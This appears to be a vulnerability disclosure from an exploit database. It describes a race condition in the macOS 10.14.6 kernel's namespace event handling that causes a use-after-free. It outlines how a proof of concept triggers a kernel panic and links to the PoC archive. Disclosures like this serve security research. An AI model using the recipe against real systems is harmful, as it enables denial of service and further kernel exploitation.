One way to violate these expectations is to make a call to fileport_makeport() in between the proc_fdunlock() and the fp_free(). The ideal case for exploitation would be that a fileport is created which holds a reference to the fileglob before the fp_free() is used to free it, leaving a dangling fileglob pointer in the fileport. In practice it's tricky to end up in that state, but I believe it's possible.

The attached POC should trigger a kernel panic. The POC works as follows:

First, an HFS DMG is created and mounted because the only paths that reach wait_for_namespace_event() pass through the HFS driver. Next, several racer threads are created which repeatedly try to call fileport_makeport(). Then, fsctl(FSIOC_SNAPSHOT_HANDLER_GET_EXT) is called to block in wait_for_namespace_event(). The namespace_handler_info_ext structure passed to fsctl() is set up such that the last call to copyout() will fail, which will cause fp_free() to be called. Finally, in order to trigger the bug, another process creates and removes a directory on the mounted HFS DMG, which causes nspace_snapshot_event() to generate an event that wait_for_namespace_event() was waiting for.

Usually this will generate a panic with the message "a freed zone element has been modified".

Tested on macOS 10.14.6 (18G87).

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47791.zip